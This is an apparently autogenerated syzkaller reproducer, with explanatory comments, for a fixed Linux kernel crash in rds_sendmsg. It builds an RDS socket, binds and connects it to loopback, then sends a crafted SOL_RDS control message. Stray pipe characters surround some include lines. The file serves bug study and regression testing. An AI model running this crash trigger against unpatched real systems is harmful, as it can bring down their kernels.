// general protection fault in rds_sendmsg
// https://syzkaller.appspot.com/bug?id=7b2aa6e2863f04d9d634332be08848742266a4e8
// status:fixed
// autogenerated by syzkaller (http://github.com/google/syzkaller)
| |
| #define _GNU_SOURCE |
| #include <endian.h> |
| #include <stdint.h> |
| #include <string.h> |
| #include <sys/syscall.h> |
| #include <unistd.h> |
| |
/* Result slot for the one resource the sequence creates: r[0] is the socket fd. */
long r[1];

/*
 * Writes a 16-byte IPv4 socket address at `base`, laid out like
 * struct sockaddr_in: family 2 (AF_INET), port 0, address 127.0.0.1 in
 * network byte order, then 8 zero bytes of padding.
 */
static void put_loopback_sockaddr(uintptr_t base)
{
    *(uint16_t *)(base + 0) = 2;
    *(uint16_t *)(base + 2) = 0;
    *(uint32_t *)(base + 4) = htobe32(0x7f000001);
    memset((void *)(base + 8), 0, 8);
}

/*
 * Replays the syscall sequence recorded for the report named in the file
 * header (a general protection fault in rds_sendmsg, marked fixed there):
 * socket -> bind -> connect -> sendmsg on one RDS socket, with every
 * argument structure built by raw stores into the fixed mapping that main()
 * sets up at 0x20000000.
 *
 * No return value is checked. If socket() fails (for example because RDS
 * support is not available on the test kernel), r[0] is -1 and the three
 * later calls are issued against that invalid descriptor, so a run that
 * exits quietly does not by itself show that the RDS send path was reached.
 *
 * NOTE(review): the page does not state the root cause. The distinguishing
 * input is a SOL_RDS control message of type 0xc (RDS_CMSG_ZCOPY_COOKIE in
 * linux/rds.h) on a send whose flags argument is 0; presumably the fault is
 * in how that message was handled -- confirm against the linked report.
 */
void loop()
{
    /* Fixed addresses inside the mapping; the values are the original ones. */
    enum {
        ADDR_BIND   = 0x2001bff0, /* sockaddr handed to bind()              */
        ADDR_PEER   = 0x20024ff0, /* sockaddr handed to connect()           */
        ADDR_CMSG   = 0x200002c0, /* control-message buffer                 */
        ADDR_MSGHDR = 0x20000300, /* message header handed to sendmsg()     */
        ADDR_IOV    = 0x20000000  /* stored as the iovec pointer; unwritten */
    };

    memset(r, -1, sizeof(r));

    /* Domain 0x15 is AF_RDS and type 5 is SOCK_SEQPACKET. */
    r[0] = syscall(__NR_socket, 0x15, 5, 0);

    /* Local and peer address are the same loopback endpoint. */
    put_loopback_sockaddr(ADDR_BIND);
    syscall(__NR_bind, r[0], ADDR_BIND, 0x10);

    put_loopback_sockaddr(ADDR_PEER);
    syscall(__NR_connect, r[0], ADDR_PEER, 0x10);

    /*
     * One control message, laid out like a 64-bit struct cmsghdr: length
     * 0x20, level 0x114 (SOL_RDS), type 0xc. The declared length covers the
     * 16-byte header plus 16 payload bytes, but only 14 payload bytes are
     * copied; the last two keep whatever the mapping already held.
     */
    *(uint64_t *)(ADDR_CMSG + 0x00) = 0x20;
    *(uint32_t *)(ADDR_CMSG + 0x08) = 0x114;
    *(uint32_t *)(ADDR_CMSG + 0x0c) = 0xc;
    memcpy((void *)(ADDR_CMSG + 0x10),
           "\xab\x97\x1c\x3f\x1a\x01\xa3\xbd\xa4\xa1\x03\x1d\x3d\x93", 14);

    /*
     * Message header, laid out like a 64-bit struct msghdr: no destination
     * name, an iovec pointer with a count of zero (no payload data), and the
     * control buffer above with a control length of 0x20.
     */
    *(uint64_t *)(ADDR_MSGHDR + 0x00) = 0;         /* msg_name       */
    *(uint32_t *)(ADDR_MSGHDR + 0x08) = 0;         /* msg_namelen    */
    *(uint64_t *)(ADDR_MSGHDR + 0x10) = ADDR_IOV;  /* msg_iov        */
    *(uint64_t *)(ADDR_MSGHDR + 0x18) = 0;         /* msg_iovlen     */
    *(uint64_t *)(ADDR_MSGHDR + 0x20) = ADDR_CMSG; /* msg_control    */
    *(uint64_t *)(ADDR_MSGHDR + 0x28) = 0x20;      /* msg_controllen */
    *(uint32_t *)(ADDR_MSGHDR + 0x30) = 0;         /* msg_flags      */

    /* The final argument is the sendmsg flags word; it is 0 here. */
    syscall(__NR_sendmsg, r[0], ADDR_MSGHDR, 0);
}
| |
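/*
 * Entry point: maps the fixed scratch region that loop() writes its syscall
 * arguments into, then runs the recorded sequence once.
 *
 * Returns 0 after loop() has run, or 1 if the scratch region could not be
 * mapped. Without that check a failed mmap would only show up as a
 * segmentation fault on the first store in loop(), which is easy to mistake
 * for an effect of the sequence itself.
 */
int main()
{
    /*
     * 16 MiB at 0x20000000. Protection 3 is PROT_READ | PROT_WRITE and
     * flags 0x32 are MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS (Linux x86
     * values), so the region starts out zero-filled.
     */
    if (syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0) == -1) {
        return 1;
    }

    loop();
    return 0;
}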